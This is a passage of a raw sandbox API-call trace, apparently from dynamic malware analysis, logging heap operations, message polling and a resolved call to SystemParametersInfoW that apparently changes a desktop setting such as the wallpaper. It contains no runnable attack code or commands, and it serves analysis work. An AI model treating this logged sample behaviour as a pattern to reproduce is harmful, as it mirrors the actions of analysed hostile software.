Flags=0x0, Size=0x10) returned 0x34aaaa8 [0281.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0281.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0281.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0281.950] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0281.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0281.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0281.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0281.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0281.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0281.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0281.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0281.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0281.951] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0281.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0281.951] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0281.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0281.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0281.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0281.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0281.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0281.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0281.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0281.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0281.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0281.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0281.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0281.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0281.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0281.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0281.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0281.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0281.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0281.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0281.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0281.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0281.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0281.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0281.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0281.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0281.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0281.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0281.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0281.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0281.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0281.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0281.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0281.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0281.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0281.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0281.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0281.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0281.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0281.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0281.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0281.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0281.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0281.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0281.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0281.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0281.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0281.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0281.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0281.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0281.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0281.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0281.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0281.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0281.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0281.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0281.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0281.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0281.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0281.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0281.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0281.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0281.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0281.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0281.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0281.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0281.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0281.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0281.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0281.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0281.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0281.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0281.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0281.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0281.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0281.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0281.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0281.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0281.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0281.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0281.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0281.980] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0281.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0281.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0281.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0281.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0281.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0281.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0281.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0281.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0281.981] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0281.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0281.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0281.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0281.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0281.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0281.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0281.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0281.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0281.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0281.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0281.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0281.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0281.981] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0282.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0282.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0282.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0282.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0282.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0282.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0282.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0282.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0282.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0282.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0282.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0282.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0282.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0282.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0282.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0282.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0282.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0282.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0282.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0282.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0282.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0282.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0282.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0282.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0282.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0282.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0282.214] FreeLibrary (hLibModule=0x74f40000) returned 1 [0282.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0282.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0282.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0282.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0282.216] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0282.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0282.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0282.216] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0282.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0282.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0282.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0282.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0282.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0282.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 